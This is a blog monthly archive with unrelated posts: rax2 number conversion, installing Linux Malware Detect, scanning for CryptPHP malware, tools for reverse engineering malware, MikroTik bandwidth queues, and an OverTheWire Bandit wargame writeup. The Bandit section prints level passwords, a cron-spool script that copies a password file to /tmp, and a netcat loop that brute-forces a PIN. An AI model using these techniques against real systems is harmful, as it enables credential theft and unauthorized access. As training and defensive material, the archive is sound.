Monthly Archives: December 2014

Base Conversion and Rax2 (Radare2 Framework)

As reverse engineers, we often face numbers in various bases, and the need to convert between them arises. We need a handy, simple calculator and converter tool to convert numbers between bases, change endianness, and so on. Our shell and Linux may ship this capability, but not as flexibly as we want.

Fortunately, the 'rax2' utility that comes with the Radare2 Framework is a good fit. Rax aims to be a minimalistic expression evaluator for the shell and can be used for making base conversions easily: between floating point values and hexadecimal representations, hexpair strings to ASCII, octal to integer, etc.

In this article we will discuss some of rax2's capabilities.

Invocation

rax2 is a single utility program. We can invoke it directly from our terminal. If no arguments are given, rax2 runs in interactive mode.

Let’s see the help.

rax2 -h

And what we see on our screen:

Usage: rax2 [options] [expr ...]
  =[base]                 ;  rax2 =10 0x46 -> output in base 10
  int   ->  hex           ;  rax2 10
  hex   ->  int           ;  rax2 0xa
  -int  ->  hex           ;  rax2 -77
  -hex  ->  int           ;  rax2 0xffffffb3
  int   ->  bin           ;  rax2 b30
  int   ->  ternary       ;  rax2 t42
  bin   ->  int           ;  rax2 1010d
  float ->  hex           ;  rax2 3.33f
  hex   ->  float         ;  rax2 Fx40551ed8
  oct   ->  hex           ;  rax2 35o
  hex   ->  oct           ;  rax2 Ox12 (O is a letter)
  bin   ->  hex           ;  rax2 1100011b
  hex   ->  bin           ;  rax2 Bx63
  hex   ->  ternary       ;  rax2 Tx23
  raw   ->  hex           ;  rax2 -S < /binfile
  hex   ->  raw           ;  rax2 -s 414141
  -b    binstr -> bin     ;  rax2 -b 01000101 01110110
  -B    keep base         ;  rax2 -B 33+3 -> 36
  -d    force integer     ;  rax2 -d 3 -> 3 instead of 0x3
  -e    swap endianness   ;  rax2 -e 0x33
  -f    floating point    ;  rax2 -f 6.3+2.1
  -F    stdin slurp C hex ;  rax2 -F < shellcode.c
  -h    help              ;  rax2 -h
  -k    randomart         ;  rax2 -k 0x34 1020304050
  -n    binary number     ;  rax2 -n 0x1234 # 34120000
  -N    binary number     ;  rax2 -N 0x1234 # x34x12x00x00
  -s    hexstr -> raw     ;  rax2 -s 43 4a 50
  -S    raw -> hexstr     ;  rax2 -S < /bin/ls > ls.hex
  -t    tstamp -> str     ;  rax2 -t 1234567890
  -x    hash string       ;  rax2 -x linux osx
  -u    units             ;  rax2 -u 389289238 # 317.0M
  -v    version           ;  rax2 -V

Compact yet informative.

Number Representations

Mathematical constants are simply fixed values we write, such as 1, 135, 182, 666, etc. They can be represented in various formats or bases. Some common representations in computer science are binary, octal, decimal, and hexadecimal.

Let's see some examples.

$ rax2 0x345
837
$ rax2 837
0x345
$ rax2 44.44f
Fx8fc23142 
$ rax2 0xfffffffd
-3
$ rax2 -3
0xfffffffd 
$ rax2 -s "41 42 43 44"
ABCD

Decimal numbers are written as is. Hexadecimal numbers carry a 0x prefix. We also see 44.44f, a decimal floating point number (suffix f), converted to the hexadecimal representation Fx8fc23142 (prefix Fx). As you can see, the prefix and suffix give important meaning to the conversion. The list of all prefixes and suffixes can be seen in the rax2 usage above.

Endianness

Endianness (big endian and little endian) defines the interpretation of the bytes making up a data word when those bytes are stored in computer memory.

Suppose we have the value 0x12345678. This is an 8-hex-digit (32-bit) value; if we split it into bytes, we have 4 bytes: 12, 34, 56, 78, where each byte takes 2 hex digits. The number will be stored differently on a big endian system and on a little endian system.

Data is written to memory locations using the smallest addressable unit: the byte. Computer memory is a big array of bytes, addressable by memory address. A memory address is just another number, ranging from low addresses to high addresses.

In big endian, the most significant byte is stored at the lowest address. In our case, 0x12345678 will be laid out like this:

[Figure hex1: big endian layout of 0x12345678 in memory]

In little endian, things are different: the least significant byte is stored at the lowest address. Here's how the same value is represented:

[Figure hex2: little endian layout of 0x12345678 in memory]

Notice that the little endian byte order is the reverse of the big endian one.

The good news is that, in addition to base conversion, rax2 can also convert a value from one endianness to the other. It's as easy as invoking rax2 with the -e argument. For example:

$ rax2 0x12345678
305419896

$ rax2 -e 0x12345678
2018915346
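As an added example (not part of the original article and not radare2 code), here is a small Python mirror of the conversions shown above: the prefix/suffix dispatch from the usage text, two's-complement handling of negative values, the Fx float form (IEEE 754 single precision printed as little-endian byte pairs, which is why 44.44f becomes Fx8fc23142) and the -e byte swap. The 32-bit word width is an assumption chosen to match the outputs above.

```python
import struct

WIDTH = 32  # assumption: the outputs on this page are consistent with 32-bit words


def to_unsigned(value, width=WIDTH):
    """Two's complement encoding: -3 -> 0xfffffffd for a 32-bit word."""
    return value & ((1 << width) - 1)


def to_signed(value, width=WIDTH):
    """Inverse of to_unsigned: 0xfffffffd -> -3 when the top bit is set."""
    return value - (1 << width) if value >= 1 << (width - 1) else value


def swap_endianness(value, nbytes=WIDTH // 8):
    """Reverse the byte order of a fixed-width word, like `rax2 -e`."""
    return int.from_bytes(value.to_bytes(nbytes, "little"), "big")


def float_to_fx(x):
    """IEEE 754 single precision, printed as little-endian byte pairs (the Fx form)."""
    return "Fx" + struct.pack("<f", x).hex()


def fx_to_float(s):
    """Undo float_to_fx: 'Fx8fc23142' -> 44.44 (as a float32)."""
    return struct.unpack("<f", bytes.fromhex(s[2:]))[0]


def hexpairs_to_raw(s):
    """`rax2 -s`: '41 42 43 44' -> 'ABCD'."""
    return bytes.fromhex(s.replace(" ", "")).decode("latin-1")


def convert(expr):
    """Dispatch on the prefix/suffix conventions listed in the rax2 usage text."""
    expr = expr.strip()
    if expr.startswith("Fx"):            # hex -> float
        return format(fx_to_float(expr), "g")
    if expr.startswith("0x"):            # hex -> int, signed when it fits 32 bits with the top bit set
        v = int(expr, 16)
        return str(to_signed(v) if v < (1 << WIDTH) else v)
    if expr.endswith("f"):               # float -> hex
        return float_to_fx(float(expr[:-1]))
    if expr.endswith("b"):               # bin -> hex
        return hex(int(expr[:-1], 2))
    if expr.endswith("d"):               # bin -> int
        return str(int(expr[:-1], 2))
    if expr.endswith("o"):               # oct -> hex
        return hex(int(expr[:-1], 8))
    if expr.startswith("b"):             # int -> bin
        return bin(int(expr[1:]))[2:]
    v = int(expr, 10)                    # int -> hex, negatives as two's complement
    return hex(to_unsigned(v) if v < 0 else v)


if __name__ == "__main__":
    for e in ("0x345", "837", "44.44f", "Fx8fc23142", "0xfffffffd", "-3", "1100011b"):
        print(e, "->", convert(e))
    print("-e 0x12345678 ->", swap_endianness(0x12345678))   # 2018915346
    print("-s 41 42 43 44 ->", hexpairs_to_raw("41 42 43 44"))  # ABCD
```

The one non-obvious design point is that the Fx form is a byte dump, not a big-endian number: 44.44 as a float32 is 0x4231c28f, and the page's Fx8fc23142 is exactly those four bytes in memory order on a little endian machine.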

How to Install Linux Malware Detect (LMD) on CentOS 6

Good evening. This article continues the previous one about the "CryptPHP PHP Malware Attack".

The presence of malware or shell scripts is very disruptive, especially since it endangers the server and the data on it. That is why tools that help us minimise the presence of malware are very much needed.

LMD, or Linux Malware Detect, is one of the tools we can use.

NOTE: Make sure you have console/SSH access with root privileges. The tutorial below has also been tested on CloudLinux.

Download LMD

cd /usr/local/src
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz

 

Install LMD
Run the commands below:

tar xfz maldetect-current.tar.gz
cd maldetect-*
./install.sh

The output is roughly as follows:

root@server# ./install.sh
 Linux Malware Detect v1.4.2
 (C) 2002-2013, R-fx Networks <proj@r-fx.org>
 (C) 2013, Ryan MacDonald <ryan@r-fx.org>
 inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
 This program may be freely redistributed under the terms of the GNU GPL
installation completed to /usr/local/maldetect
 config file: /usr/local/maldetect/conf.maldet
 exec file: /usr/local/maldetect/maldet
 exec link: /usr/local/sbin/maldet
 exec link: /usr/local/sbin/lmd
 cron.daily: /etc/cron.daily/maldet
maldet(776396): {sigup} performing signature update check...
 maldet(776396): {sigup} local signature set is version 201205035915
 maldet(776396): {sigup} new signature set (2014060827500) available
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/md5.dat
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/hex.dat
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/rfxn.ndb
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/rfxn.hdb
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/maldet-clean.tgz
 maldet(776396): {sigup} signature set update completed
 maldet(776396): {sigup} 11744 signatures (9855 MD5 / 1889 HEX)

Configuration
There are a few things that need to be set up; here are the steps:

nano /usr/local/maldetect/conf.maldet

Options that must be updated:

  • email_alert=1
  • email_addr="webmaster@mydomain.com"
  • quar_hits=1

 
Run LMD
By default a daily cron job is already created, but to make sure LMD runs we can start it manually with the command below:

/usr/local/sbin/maldet --scan-all /home

The command above scans /home.

To adjust LMD's daily cron job, edit the file /etc/cron.daily/maldet.
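An added Python helper (not part of the post and not LMD's own code) that applies the three settings listed above to conf.maldet idempotently: an existing assignment is rewritten in place, a missing key is appended, so re-running the step never duplicates a key. The path defaults to the one install.sh printed; the sample config text in demo() is constructed for the demonstration.

```python
import re
from pathlib import Path

CONF_PATH = Path("/usr/local/maldetect/conf.maldet")   # path printed by install.sh above
WANTED = {"email_alert": "1", "email_addr": "webmaster@mydomain.com", "quar_hits": "1"}

# KEY=VALUE, optionally quoted, optionally followed by a trailing '#' comment
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)=("?)(.*?)\2\s*(#.*)?$')


def set_options(text, wanted):
    """Return the config text with every key in `wanted` set exactly once."""
    out, seen = [], set()
    for line in text.splitlines():
        m = ASSIGN_RE.match(line)
        if m and m.group(1) in wanted:
            key = m.group(1)
            out.append(f'{key}="{wanted[key]}"')   # rewrite in place, keep its position
            seen.add(key)
        else:
            out.append(line)                       # comments and other keys untouched
    for key, value in wanted.items():
        if key not in seen:
            out.append(f'{key}="{value}"')         # key absent: append it
    return "\n".join(out) + "\n"


def read_options(text):
    """Parse KEY=VALUE lines into a dict (quotes stripped, trailing comments ignored)."""
    opts = {}
    for line in text.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            opts[m.group(1)] = m.group(3)
    return opts


def apply_to_file(path=CONF_PATH, wanted=WANTED):
    """Rewrite the real conf.maldet; run as root after install.sh."""
    path.write_text(set_options(path.read_text(), wanted))


def demo():
    """Constructed sample config (not a real conf.maldet) showing the rewrite."""
    sample = ('# constructed sample\n'
              'email_alert=0\n'
              'email_addr="you@domain.com"\n'
              'quar_hits=0\n'
              'scan_max_depth=15   # unrelated key stays as is\n')
    updated = set_options(sample, WANTED)
    return updated, read_options(updated)


if __name__ == "__main__":
    text, opts = demo()
    print(text)
    print(opts)
```

Calling apply_to_file() with no arguments edits the installed file; demo() exercises the same logic on the constructed text so it can be checked without touching /usr/local.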

Have fun, bro :)
Source: cpanelku

Scanning for the CryptPHP PHP Malware Attack

Good evening and happy year-end, bro. I can hardly believe this blog has been running for over a year, haha. Anyway, this time the topic is the CryptPHP PHP Malware Attack.

If your IP suddenly shows up in the Spamhaus database, it must be followed up, because CryptPHP PHP malware attacks are currently widespread.

How do we follow up on CryptPHP PHP? Here are the steps:

Check your IP at www.spamhaus.org. If our IP is on the list, click the information link that Spamhaus provides.

The findbot script

findbot.pl is a Perl script written to look for files infected by the CryptPHP PHP malware; it can also find files such as r57shell, cryptphp and so on.

Make sure Perl is properly installed.

Download findbot.pl:

wget http://cbl.abuseat.org/findbot.pl

 

Run the command:

perl findbot.pl -c

 
Find command (lists PNG files under /home whose contents contain PHP code):

find /home/ -name "social*.png" -exec grep -q -E -o 'php.{0,80}' {} \; -print
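The find command above only greps for the literal text "php". As an added example (not part of the post and not from findbot.pl), here is a Python scanner that goes one step further: for each file matching the same glob it checks that the bytes actually start with the image format's magic number for its extension, and reports the first PHP marker it finds. The magic-number table and marker patterns are assumptions covering the common cases; demo() builds two constructed files in a temporary directory.

```python
import re
import tempfile
from pathlib import Path

# Magic bytes a genuine image of that extension starts with (assumption: common formats only)
IMAGE_MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8",
               ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}
# PHP code has no business inside an image; these markers are the usual giveaways
PHP_MARKER = re.compile(rb"<\?php|<\?=|\beval\s*\(|base64_decode\s*\(", re.IGNORECASE)


def inspect_image(path):
    """Findings for one file: wrong header for its extension, and/or PHP markers in the bytes."""
    data = path.read_bytes()
    findings = []
    expected = IMAGE_MAGIC.get(path.suffix.lower())
    if expected is not None and not data.startswith(expected):
        findings.append("header does not match extension")
    m = PHP_MARKER.search(data)
    if m:
        context = data[m.start():m.start() + 80].decode("latin-1").splitlines()[0]
        findings.append("php marker: " + context)
    return findings


def scan_tree(root, pattern="social*.png"):
    """Walk `root` for files matching `pattern` (the same glob as the find command above)."""
    hits = {}
    for path in Path(root).rglob(pattern):
        if path.is_file():
            findings = inspect_image(path)
            if findings:
                hits[str(path)] = findings
    return hits


def demo():
    """Constructed files in a temp dir: one clean PNG and one PHP file named like an image."""
    root = Path(tempfile.mkdtemp())
    (root / "social1.png").write_bytes(IMAGE_MAGIC[".png"] + b"\x00" * 64)
    (root / "social2.png").write_bytes(b"<?php eval(base64_decode('aGVsbG8=')); ?>")
    hits = scan_tree(root)
    return {Path(p).name: findings for p, findings in hits.items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings)
    # on a real host: scan_tree("/home")
```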

 
Thanks to BennyKusman at DiskusiWebhosting.com

Reverse Engineering Hostile Codes

Computer criminals are always ready to exploit weaknesses in a system with their hostile code: computer viruses, worms, Trojans, malware, you name it. Often these programs are custom compiled and not widely distributed. Because of this, anti-virus software won't detect their presence.

In this article we will try to outline the process of reverse engineering hostile code. Hostile code means any process running on a system that is not authorised by the system administrators. However, our scope will be limited: this article is not intended as an in-depth tutorial, rather a description of the tools and steps involved.

Tools

There are many tools that can be used for reverse engineering, on both Unix and Windows platforms. However, Unix is still the ideal platform in my opinion. If you install Cygwin on Windows, you can emulate a Unix environment and do what you can do in Unix.

Going the Windows route will cost a lot of money, whereas most of the Unix solutions are free and open source.

Some useful commands based on their categories:

  1. Disk image tool – creates a disk image, converting and copying a file byte by byte. Useful for analysing a compromised system's disk without affecting the integrity of the evidence of the intrusion. Solution in this category: dd.
  2. File type identifier – identifies the type of a file. Identification should rely on the magic number in some part of the file rather than on the file extension. Solution in this category: file.
  3. String identifier – outputs readable strings from a file. Strings might reside in the data section or even the code section. Solution in this category: strings.
  4. Hex editor – reads and edits binary files. Solutions in this category: okteta, HexRay.
  5. Checksum – creates a unique checksum for comparison purposes. Solutions in this category: md5sum, sha1sum, sha256sum.
  6. Diff tools – show differences between files. Solution in this category: diff.
  7. File monitors – show all files and sockets opened by a process. Solution in this category: lsof.
  8. Packet sniffer – captures network packets and traffic to/from the machine. Solutions in this category: tcpdump, wireshark.
  9. String search – searches for strings within a file. Solution in this category: grep.
  10. Packer/unpacker – see the Packer section.
  11. Decompiler – see Decompilation.
  12. Disassembler – see Disassembling.

Packer

Malware is often compressed with an executable packer. This not only makes the code more compact, but also prevents much of the internal string data from being viewed. The most commonly used packer is UPX, which can compress Linux or Windows binaries. Other solutions are available, but they are typically Windows-only packers. The good thing is that UPX provides manual decompression to restore the original image, which saves a lot of time.

In an ordinary executable, running the "strings" command or examining the malware with a hex editor should show many readable and complete strings. If we see random characters or mostly truncated and scattered pieces of text, most likely the executable has been packed. Find the string "UPX" somewhere in the file to confirm that the UPX packer was involved; otherwise you may have to deal with one of the many other executable packers.
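The two checks just described, few readable strings and a UPX marker, are easy to automate. The following is an added Python example (not from the original article and not UPX's own code): it measures the share of a file covered by printable runs of four or more characters, the same thing `strings` prints by default, and looks for the UPX magic and section names. The 0.2 threshold is an assumption and should be tuned against known-good binaries; both sample buffers are constructed stand-ins, not real executables.

```python
import random
import re

STRING_RUN = re.compile(rb"[\x20-\x7e]{4,}")        # what `strings` prints with its default minimum of 4
UPX_MARKERS = (b"UPX!", b"UPX0", b"UPX1", b"UPX2")  # UPX magic and the section names it leaves behind


def readable_ratio(data):
    """Share of the file that lies inside printable runs of 4+ characters."""
    if not data:
        return 0.0
    return sum(len(m.group()) for m in STRING_RUN.finditer(data)) / len(data)


def packer_markers(data):
    """Which UPX markers appear anywhere in the bytes."""
    return [m.decode() for m in UPX_MARKERS if m in data]


def assess(data, threshold=0.2):
    """Rule of thumb from the text: few readable strings, or a UPX marker, suggests packing.
    The threshold is an assumption; tune it on known-good binaries for your platform."""
    ratio = readable_ratio(data)
    markers = packer_markers(data)
    return {"ratio": round(ratio, 3), "markers": markers,
            "likely_packed": ratio < threshold or bool(markers)}


def constructed_plain_binary():
    """Stand-in for an ordinary executable: a header plus a data section full of messages."""
    messages = (b"usage: tool [options]\n" b"connect to %s:%d\n"
                b"GET / HTTP/1.1\r\n" b"Host: example\r\n") * 20
    return b"\x7fELF" + b"\x00" * 32 + messages


def constructed_packed_binary():
    """Stand-in for a UPX-packed file: compressed bytes look random, but the marker survives."""
    rng = random.Random(2014)                         # fixed seed keeps the demo deterministic
    body = bytes(rng.getrandbits(8) for _ in range(4000))
    return b"\x7fELF" + body[:1000] + b"UPX!" + body[1000:]


if __name__ == "__main__":
    print("plain :", assess(constructed_plain_binary()))
    print("packed:", assess(constructed_packed_binary()))
```

To run it on a real sample, pass open(path, "rb").read() to assess(). A low ratio without a marker points at one of the other packers the text mentions, or at encryption.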

Decompilation

Some malware might be written in an interpreted or semi-interpreted language such as .NET or Java. In that case you can consider yourself lucky: there are tools available to decompile these languages to varying degrees.

  • .NET – Microsoft's flagship programming platform. Several decompilers exist, such as ILSpy and dotPeek.
  • Visual Basic – more precisely, Visual Basic before the .NET era. Visual Basic applications are assembled into so-called P-Code. One Visual Basic P-Code decompiler is P32Dasm.
  • Java – the famous cross-platform language. There is an excellent decompiler, jad. Several other known decompilers exist, such as JD, Mocha and the JEB Decompiler (for Android APKs).
  • Delphi – Pascal done differently. Delphi was once the de facto Rapid Application Development standard. Several decompilers exist, such as DeDe, DE Decompiler and Interactive Delphi Reconstructor.

Some popular interpreted languages can be compiled to native code, and there are tools for decompiling those too. While malware engineered in these languages is rarely seen, it's a good idea to keep the tools in our arsenal.

If malware is written in native code using a compiled language, there is still a chance we can decompile it. The Hex-Rays decompiler is one tool that serves this purpose; it is a plug-in for IDA Pro, so we need IDA Pro first. Another option is the Boomerang decompiler.

However, keep in mind that there is no guarantee that decompilation will return the code as it was written.

Disassembling

Native code decompilers exist; however, as said before, decompilation gives no guarantee of returning the code as it was. Our next option is a disassembler. These tools disassemble the executable into assembly code. For Unix we can use objdump and some of its wrappers like dasm; for Windows we can use W32Dasm. Some multi-platform tools exist, such as IDA Pro and Radare2. These programs disassemble our code, match up strings in the data segment to where they are used in the program, and show us the separation between subroutines.

Debuggers

Dead listing can be quite valuable, but we still want to debug the code, especially if the malware communicates via network sockets. Debuggers give us access to the memory and temporary variables stored in the program, as well as all data it sends and receives over socket communication.

In Unix land there is the gdb debugger. Under Windows the choices are far more varied, but most tutorials on reverse engineering under Win32 use OllyDbg and SoftICE.

Environment Preparation

Running hostile code must be done with extra precautions, even under a debugger. Never debug malware on a production machine or network. Ideally, a lab network created specially for this purpose is recommended. Here is the minimal recommended network configuration:

[Figure reverseengineeringtrojans1: minimal lab network of debug system, firewall and sniffer]

The debug system should have a clean install of whatever operating system the malware is intended for. The firewall is used to protect the network from unwanted incidents from outside. Ensure that you firewall all outbound connections, allowing only the Trojan's control connection through. If you don't want the master controller to know your lab network is running the Trojan, you can set up services to mimic the resources the Trojan needs, such as an IRC or FTP/TFTP server. The third machine on the network is the sniffer, which emulates those services and also captures the network traffic generated by the malware.

Debugging Process

Key-Function Search

First, we skim the code and search for particularly interesting functions. We look for key functions such as Winsock and file I/O calls, then find where these key functions are invoked and set debugger breakpoints on them. There we can interrupt the flow of the program and examine memory and CPU registers at that point.

Running the Code

One thing we want to inspect is how the malware communicates with others, or with its controller. Often, sniffing the network traffic will be sufficient. However, many newer Trojans incorporate encryption into their network traffic, making sniffing useless. With some cleverness we can still grab the messages from memory before they are encrypted: by setting a breakpoint on the "send" socket library call, we can interrupt the code just prior to the packet being sent. Then, by getting a stack trace, we can see where we are in the program.

Another thing to consider is the payload, or what the malware actually does. Poking through the file system and looking at interesting system calls may be of interest.

[LAB 6]: SIMPLE BANDWIDTH MANAGEMENT CONFIGURATION ON MIKROTIK (QOS)

Assalamualaikum WR WB
Good evening

Today I will explain what managing network bandwidth is and give a configuration example using Simple Bandwidth Management.

Explanation

In managing a network, it is very important to manage the bandwidth available on that network. As a network engineer you certainly do not want complaints from many people in the office just because the internet is slow and so on. That is why proper bandwidth management is very important.

MikroTik routers have a feature called queue that manages bandwidth on the network. This way the distribution of bandwidth to each client can be managed properly.

In this case I have 1 MB of bandwidth for download and 1 MB for upload. I want to distribute that bandwidth to every client; I have 10 clients that will get a share of it. Each client gets 128K for download and 128K for upload. Here is the bandwidth management configuration on MikroTik:

Configuration

Based on the case above, here is the Simple Bandwidth Management configuration on MikroTik:


As seen in the configuration above, there is a range of client IP addresses from 192.168.1.10 to 192.168.1.19, with each IP address named "user-1" through "user-10". More important still is the "max-limit" syntax, which is the parameter for the maximum download/upload bandwidth a client gets.

Verification

After configuring Simple Bandwidth, we verify the configuration we just made.


Configuration Result

Here is the result of the Simple Bandwidth configuration above:


The client with IP address 192.168.1.20 only gets 122K of bandwidth, which does not exceed the configured max-limit of 128K.

Simple Bandwidth with a Time Window

The Simple Bandwidth configuration can be extended with a time parameter, so we can decide how much bandwidth a client gets at particular times. This configuration is very helpful for a company's working hours. Here is the configuration:


The configuration above is basically the same as the previous one, only with the "time" syntax added to describe from what hour to what hour and from what day to what day it applies. This configuration happens to use 8 AM to 5 PM (17:00), with days from Monday to Friday. Here is the verification of that configuration:


Simple Bandwidth with Priority

Simple Bandwidth also has another feature: priority. Priority in MikroTik has a scale from 1 to 8, and of course priority 1 is the highest. In the previous configurations the priority was always 8, because if we do not give a priority value to a limit, MikroTik fills it in with priority 8 by default. To make it clearer, here is the configuration:


In the configuration above, user 1 with IP address 192.168.1.10 has the highest priority, 1. So when all users are using the internet at once, the client that bandwidth management prioritises is user 1, because it has priority number 1.

Here is the verification of the configuration above:


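Since the post's configuration screenshots did not survive, here is an added Python helper (not from the post and not MikroTik's code) that generates the ten simple-queue commands the text describes and computes how far the per-client limits oversubscribe the link. The RouterOS v6 syntax it emits (`/queue simple add name= target= max-limit=UP/DOWN time= priority=`) is an assumption reconstructed from the author's description; check it against your RouterOS version before pasting it into a terminal.

```python
from ipaddress import ip_address


def simple_queue_commands(first_ip="192.168.1.10", clients=10, max_limit="128k/128k",
                          time_window=None, priorities=None):
    """One `/queue simple add` line per client, named user-1 .. user-N.

    Assumption: RouterOS v6 keywords. `time_window` such as "8h-17h,mon,tue,wed,thu,fri"
    restricts when the queue applies; `priorities` maps a user name to 1..8 (1 = highest).
    Users not listed keep RouterOS's default of 8, so no priority= is emitted for them."""
    base = ip_address(first_ip)
    priorities = priorities or {}
    commands = []
    for i in range(clients):
        name = f"user-{i + 1}"
        parts = [f"/queue simple add name={name}",
                 f"target={base + i}/32",
                 f"max-limit={max_limit}"]
        if time_window:
            parts.append(f"time={time_window}")
        if name in priorities:
            parts.append(f"priority={priorities[name]}")
        commands.append(" ".join(parts))
    return commands


def oversubscription(link_kbps, per_client_kbps, clients):
    """How many times the sum of per-client max-limits exceeds the physical link.
    Above 1 the limits are ceilings, not guarantees: under full load the queue
    shares the link and priority decides who is served first."""
    return clients * per_client_kbps / link_kbps


if __name__ == "__main__":
    for cmd in simple_queue_commands(time_window="8h-17h,mon,tue,wed,thu,fri",
                                     priorities={"user-1": 1}):
        print(cmd)
    # 10 clients x 128k against a 1024k link -> 1.25
    print("oversubscription:", oversubscription(1024, 128, 10))
```

The oversubscription figure explains the priority section: with ten 128K ceilings on a 1M link, not every client can reach its max-limit at the same time, which is exactly when the priority value of user-1 starts to matter.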

That is the explanation of Simple Bandwidth Management on MikroTik. I hope it is useful for the readers. Thank you for stopping by my blog. :)

Good evening

Wassalamualaikum WR WB

References:

Moch. Linto Herlambang & Aziz Catur L. 2008. Panduan lengkap Mikrotik RouterOS. Yogyakarta. ANDI

Rendra Towidjojo. 2013. Mikrotik Kungfu Kitab 1. Jakarta. Jasakom


OverTheWire.org Wargames – Bandit – Level 20 to Level 29

OverTheWire.org is one of the good sites offering wargames. In this context, a wargame is a game specifically designed to help people learn and practice security concepts in a fun way. One of the wargame categories provided by OverTheWire is Bandit, which is aimed at absolute beginners.

This writeup contains my solutions to the OverTheWire Bandit challenges. The solutions written here are for level 20 and above.


How to Play

Bandit, like other games, is organised in levels. We start playing at level 0 and try to "beat" or "finish" it. Every level beaten gives a clue on how to start the next level.

There are several things you can try when you are unsure how to continue:

  • First, if you know a command but don't know how to use it, try the manual (man page) by entering "man <command>" (without the quotes). E.g. if you know about the "ls" command, type: man ls. The "man" command also has a manual; try it. Press q to quit man.
  • Second, if there is no man page, the command might be a shell built-in. In that case use the "help <X>" command, e.g. help cd.
  • Also, your favourite search engine is your friend.
  • Lastly, if you are still stuck, you can join us on IRC.

Level 20

ssh bandit20@bandit.labs.overthewire.org

pass: GbKksEFF4yrVs6il55v6gwY5aVje5f0j

There is an executable file "suconnect". It makes a connection to localhost on the port we specify as a command-line argument, then reads a line of text from the connection and compares it to the password for the current level. If the password is correct, it transmits the password for level 21.

All we need to do is run nc listening on a random port, then connect to it with suconnect. We send the password through the nc session and suconnect sends back the new password.

nc -l 13510 < /etc/bandit_pass/bandit20 &
./suconnect 13510
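The exchange described above, as an added Python example that is not part of the original writeup and not the game's suconnect binary: one function plays the nc listener, the other mirrors what the level text says suconnect does (connect to localhost, read a line, compare, reply). Both halves run in one process over loopback on an OS-chosen port. The passwords and the failure message are constructed placeholders; on the game host the real value comes from /etc/bandit_pass.

```python
import socket
import threading

# Constructed placeholder values; on the game host the real ones are read from /etc/bandit_pass.
CURRENT_PASSWORD = "current-level-password"
NEXT_PASSWORD = "next-level-password"


def suconnect_like(port, expected, next_password):
    """Client side, mirroring what the level text says suconnect does: connect to
    localhost:PORT, read one line, compare it, answer with the next password on success."""
    with socket.create_connection(("127.0.0.1", port)) as conn:
        line = conn.makefile("rb").readline().decode().rstrip("\n")
        reply = next_password if line == expected else "wrong password"  # failure text is constructed
        conn.sendall(reply.encode() + b"\n")


def nc_like_exchange(line_to_send, expected=CURRENT_PASSWORD, next_password=NEXT_PASSWORD):
    """Listener side, playing the role of `nc -l PORT < passfile`: accept one client,
    send it the line, and return whatever comes back. The client runs in a thread so
    both halves of the exchange happen in this one process."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    client = threading.Thread(target=suconnect_like, args=(port, expected, next_password))
    client.start()
    conn, _ = srv.accept()
    with conn:
        conn.sendall(line_to_send.encode() + b"\n")
        reply = conn.makefile("rb").readline().decode().rstrip("\n")
    client.join()
    srv.close()
    return reply


if __name__ == "__main__":
    print(nc_like_exchange(CURRENT_PASSWORD))  # next-level-password
    print(nc_like_exchange("guess"))           # wrong password
```

The point to notice is the direction of the data: the listener speaks first, which is why redirecting the password file into nc's stdin is enough, and the answer arrives on the same connection.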

Level 21

ssh bandit21@bandit.labs.overthewire.org

pass: gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

There is a cron job we need to look at. In /etc/cron.d there are several cron files, but our target is cronjob_bandit22, which looks promising. Investigate it to see what the script does.

The cron entry executes the script /usr/bin/cronjob_bandit22.sh, which dumps /etc/bandit_pass/bandit22 into the file /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv.

cat /etc/cron.d/cronjob_bandit22
cat /usr/bin/cronjob_bandit22.sh
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Level 22

ssh bandit22@bandit.labs.overthewire.org

pass: Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Another cron job. This time, the script used by the cron job copies /etc/bandit_pass/bandit23 to a file in /tmp. There's no need to figure out the filename by hand; we can always recreate how it is derived.

cat /etc/cron.d/cronjob_bandit23
cat /usr/bin/cronjob_bandit23.sh
cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)

Level 23

ssh bandit23@bandit.labs.overthewire.org

pass: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Another cron job.

In this level we need to create our own shell script to run. The cron job script executes (and later deletes) the scripts in /var/spool/bandit24, so we can create a script in that directory that dumps the password from /etc/bandit_pass/bandit24 to anywhere we like. We just need to make sure the script is executable.

The script we create:

#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/bandit24xathpass

Then we do:

chmod +x /var/spool/bandit24/<your-script>.sh
cat /tmp/bandit24xathpass

Level 24

ssh bandit24@bandit.labs.overthewire.org

pass: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Another tedious level.

There is a service running on port 30002. It asks for two words: the password for bandit25 and a secret 4-digit pincode, separated by a space. Our only option is brute-forcing all 10000 combinations.

This is a one-line command, arranged over multiple lines for clarity.

for i in {0000..9999}; do 
    echo $i; 
    echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -Ev "separated|Wrong|Exit" >> /tmp/xathrya25.brute; 
    done && cat /tmp/xathrya25.brute

Level 25

ssh bandit25@bandit.labs.overthewire.org

pass: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Not Available Yet.

Level 26

ssh bandit26@bandit.labs.overthewire.org

pass:

Not Available Yet.

Level 27

ssh bandit27@bandit.labs.overthewire.org

pass:

Not Available Yet.

Level 28

ssh bandit28@bandit.labs.overthewire.org

pass:

Not Available Yet.

Level 29

ssh bandit29@bandit.labs.overthewire.org
